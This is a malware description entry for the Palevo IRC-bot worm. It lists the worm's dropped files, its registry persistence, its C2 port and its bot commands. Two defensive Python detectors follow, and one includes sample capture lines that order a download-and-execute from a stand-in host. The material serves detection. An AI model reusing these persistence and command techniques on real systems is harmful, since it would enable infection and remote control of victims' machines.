
Worm.P2P.Palevo.DP

HIGH
HIGH
Size: approx 100 kb
Aliases: Backdoor.Win32.IRCBot.oyd, Worm:Win32/Pushbot.RK, P2P-Worm:W32/Palevo.CF

Symptoms

Unwanted messages sent to friends via IM clients containing a link to a photo.


Removal instructions:

Please let BitDefender disinfect your files.

Analyzed By

Bogdan Timofte, virus researcher; Alexandru Maximciuc, virus researcher

Technical Description:

Worm.P2P.Palevo.DP spreads via automated IM spam. The message tricks users into saving what appears to be a .JPG file but is in fact an executable concealing the malicious payload, Worm.P2P.Palevo.DP. When the user tries to open the file, the malicious code is launched.

The worm creates four hidden files in a folder chosen as described below:

    [FilePath]\infocard.exe
    [FilePath]\mds.sys
    [FilePath]\mdt.sys
    [FilePath]\winbrd.jpg

where [FilePath] is one of %Windir%, %Public% or %ProgramFiles%, depending on which of these folders the worm is able to write to.

It then modifies several registry keys so that they point to these files, in order to bypass the OS's firewall:

    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ [Firewall Administrating = "[FilePath]\infocard.exe"]
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\Run\ [Firewall Administrating = "[FilePath]\infocard.exe"]
    HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\ [Firewall Administrating = "[FilePath]\infocard.exe"]
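As an added example (not Bitdefender's tooling), the following Python script checks a host for the persistence artifacts listed above: it resolves the three candidate [FilePath] folders from the environment, looks for the four dropped files, and inspects the three Run keys for a "Firewall Administrating" value pointing at infocard.exe. Only the file names, key paths and value name come from this description; the snapshot layout, function names and the live-registry helper (which uses winreg and therefore only does anything on Windows) are assumptions made for the example. The matching functions are kept pure so they can be exercised against a constructed snapshot on any platform.

```python
"""Host check for the Worm.P2P.Palevo.DP persistence artifacts described above.

Added example, not Bitdefender's code. Only the file names, the registry key
paths and the value name come from the description; the snapshot layout and
function names are assumptions made for this example.
"""
import ntpath  # Windows path joining that also behaves the same on other OSes
from typing import Callable, Dict, List, Tuple

DROPPED_FILES = ("infocard.exe", "mds.sys", "mdt.sys", "winbrd.jpg")
RUN_VALUE_NAME = "Firewall Administrating"
RUN_KEYS = (
    r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
    r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Terminal Server"
    r"\Install\Software\Microsoft\Windows\CurrentVersion\Run",
    r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run",
)
# Environment variables behind %Windir%, %Public% and %ProgramFiles%.
DROP_DIR_VARS = ("WINDIR", "PUBLIC", "PROGRAMFILES")


def candidate_dirs(env: Dict[str, str]) -> List[str]:
    """Resolve the possible [FilePath] values from an environment mapping."""
    return [env[v] for v in DROP_DIR_VARS if v in env]


def find_dropped_files(dirs: List[str], exists: Callable[[str], bool]) -> List[str]:
    """Return every dropped-file path that `exists` reports as present."""
    return [ntpath.join(d, f) for d in dirs for f in DROPPED_FILES
            if exists(ntpath.join(d, f))]


def match_run_values(snapshot: Dict[str, Dict[str, str]]) -> List[Tuple[str, str]]:
    """snapshot maps a key path to {value name: data}; return (key, data) hits
    where the 'Firewall Administrating' value points at infocard.exe."""
    hits = []
    for key in RUN_KEYS:
        data = snapshot.get(key, {}).get(RUN_VALUE_NAME)
        if data is not None and data.strip('"').lower().endswith("infocard.exe"):
            hits.append((key, data))
    return hits


def read_run_keys_live() -> Dict[str, Dict[str, str]]:
    """Read the three Run keys from the live registry. Windows only; returns an
    empty snapshot elsewhere so the pure functions above remain usable."""
    try:
        import winreg
    except ImportError:
        return {}
    hives = {"HKEY_LOCAL_MACHINE": winreg.HKEY_LOCAL_MACHINE,
             "HKEY_CURRENT_USER": winreg.HKEY_CURRENT_USER}
    snapshot: Dict[str, Dict[str, str]] = {}
    for key in RUN_KEYS:
        hive_name, _, subkey = key.partition("\\")
        try:
            with winreg.OpenKey(hives[hive_name], subkey) as handle:
                values: Dict[str, str] = {}
                index = 0
                while True:
                    try:
                        name, data, _ = winreg.EnumValue(handle, index)
                    except OSError:  # no more values under this key
                        break
                    values[name] = str(data)
                    index += 1
                snapshot[key] = values
        except OSError:  # key absent (the Terminal Server key often is)
            continue
    return snapshot


if __name__ == "__main__":
    import os
    for path in find_dropped_files(candidate_dirs(dict(os.environ)), os.path.exists):
        print("dropped file present:", path)
    for key, data in match_run_values(read_run_keys_live()):
        print("persistence value present:", key, "->", data)
```

A hit on the registry value alone is a strong indicator, since the value name is not one Windows itself creates; a hit on winbrd.jpg or the .sys files alone is weaker and should be confirmed against the file hash rather than the name.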

The worm establishes a connection to an IRC server at "dbs[removed]s.com" or "e2[removed]o.com" on port 2345 and waits for commands. It responds to the following commands:


- "r.gf" - starts a thread that downloads a file and executes it.
- "r.gfstop" - stops the download-and-execute thread.
- "yah.msg" - sends Yahoo IM messages containing an infected link.
- "msn.msg" - sends both Yahoo and MSN IM messages containing an infected link, for example: ".msn.msg foto :D http://[removed]image.php?= ". The infected links point to multiple domains hosting the worm.
- "msn.stop" - stops the running message-sending thread.
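As an added example (not Bitdefender's code), here is a small Python detector for the command set above, of the kind one would run over IRC lines reassembled from a packet capture or a proxy log. It parses IRC PRIVMSG lines, flags a message whose first word is one of the five bot commands (with or without the leading "." seen in the example), extracts any URL in the message so it can be blocked, and records whether the traffic used port 2345 as the description states. The command tokens and port come from this page; the record layout, the function names and the sample capture (which uses the reserved name example.invalid) are constructed for the example.

```python
"""Detection of the IRC bot commands listed above in captured IRC traffic.

Added example, not Bitdefender's code. The command tokens, the port (2345) and
the shape of the example message come from the description; the record layout,
the sample capture and the function names are constructed for this example.
"""
import re
from typing import Dict, Iterable, List, Optional, Tuple

C2_PORT = 2345
# Command token -> what the description says it does.
BOT_COMMANDS = {
    "r.gf": "start download-and-execute thread",
    "r.gfstop": "stop download-and-execute thread",
    "yah.msg": "send Yahoo IM spam",
    "msn.msg": "send Yahoo and MSN IM spam",
    "msn.stop": "stop message-sending thread",
}
PRIVMSG_RE = re.compile(r"^(?::(?P<prefix>\S+) )?PRIVMSG (?P<target>\S+) :(?P<text>.*)$")
URL_RE = re.compile(r"https?://\S+")


def classify_privmsg(line: str) -> Optional[Dict[str, object]]:
    """Return a hit when the first word of a PRIVMSG body is a known bot command
    (with or without the leading '.' seen in the example); otherwise None."""
    m = PRIVMSG_RE.match(line.strip())
    if not m:
        return None
    words = m.group("text").split()
    if not words:
        return None
    token = words[0].lstrip(".")
    if token not in BOT_COMMANDS:
        return None
    return {
        "command": token,
        "purpose": BOT_COMMANDS[token],
        "sender": m.group("prefix"),
        "target": m.group("target"),
        # Links carried by the command; candidates for blocking at proxy/DNS.
        "urls": URL_RE.findall(m.group("text")),
    }


def scan_capture(records: Iterable[Tuple[int, str]],
                 c2_port: int = C2_PORT) -> List[Dict[str, object]]:
    """records are (destination port, IRC line) pairs. Flag every bot command
    and note whether it travelled over the port named in the description."""
    alerts: List[Dict[str, object]] = []
    for port, line in records:
        hit = classify_privmsg(line)
        if hit is not None:
            hit["on_c2_port"] = port == c2_port
            alerts.append(hit)
    return alerts


# Constructed sample capture (not real traffic); example.invalid is a reserved name.
SAMPLE_CAPTURE = [
    (2345, ":ctl!u@h PRIVMSG #z :.msn.msg foto :D http://example.invalid/image.php?="),
    (2345, ":ctl!u@h PRIVMSG #z :.r.gf http://example.invalid/upd.bin"),
    (2345, "PING :irc.example.invalid"),
    (6667, ":alice!u@h PRIVMSG #linux :anyone seen r.gf in the logs?"),
    (2345, ":ctl!u@h PRIVMSG #z :msn.stop"),
]

if __name__ == "__main__":
    for alert in scan_capture(SAMPLE_CAPTURE):
        print(alert)
```

Matching only the first word of the message body keeps ordinary chat that happens to mention a token (the #linux line above) from alerting, while the port flag lets an analyst prioritise hits that also match the description's network indicator.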